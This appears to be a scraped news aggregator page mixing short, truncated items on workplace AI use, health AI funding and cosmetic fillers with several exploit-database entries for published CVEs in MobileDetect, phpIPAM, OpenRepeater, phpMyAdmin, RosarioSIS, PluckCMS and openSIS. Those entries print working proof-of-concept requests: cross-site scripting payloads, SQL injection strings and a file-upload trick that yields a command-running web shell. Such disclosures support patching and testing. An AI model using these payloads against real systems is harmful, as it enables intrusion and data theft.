One in six employees say they lie about using AI to meet workplace expectations
One in six US workers say they lie about using AI to meet job expectations…
MobileDetect 2.8.31 – Cross-Site Scripting (XSS)
# Exploit Title: MobileDetect 2.8.31 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. …
We’re announcing new health AI funding, while a new report signals a turning point for health in Europe.
At the European Health Summit in Brussels, Greg Corrado, Distinguished Scientist at Google, released a new report authored by Implement Consulting Group and commissioned by Google revealing that AI is reversing the long-term trend of slowing scientific productivity, providing a turning point for a European healthcare system grappling with rising costs and workforce shortages. The…
phpIPAM 1.4 – SQL-Injection – PHP webapps Exploit
# Exploit Title: phpIPAM 1.4 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.4 # Tested on: Windows # CVE : CVE-2019-16693 Proof Of Concept # Ensure you have a valid user session before executing the PoC. POST /app/admin/custom-fields/order.php…
OpenRepeater 2.1 – OS Command Injection
# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…
phpMyAdmin 5.0.0 – SQL Injection
# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…
RosarioSIS 6.7.2 – Cross Site Scripting (XSS)
# Exploit Title: RosarioSIS 6.7.2 – Cross Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15716 Proof Of Concept http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22 **Conditions**: 1. User must be authenticated (as shown by the session…
Warning over cosmetic face fillers as scans reveal new details of risks
Michelle RobertsDigital health editor Getty Images People who have cosmetic filler injections in their face should be warned of the risk of a dangerous complication involving blocked arteries that can lead to skin loss and even blindness due to damaged blood flow, say experts. Researchers used ultrasound to study 100 cases of filler injections that…
PluckCMS 4.7.10 – Unrestricted File Upload
# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…
RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)
# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …
openSIS Community Edition 8.0 – SQL Injection
# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…
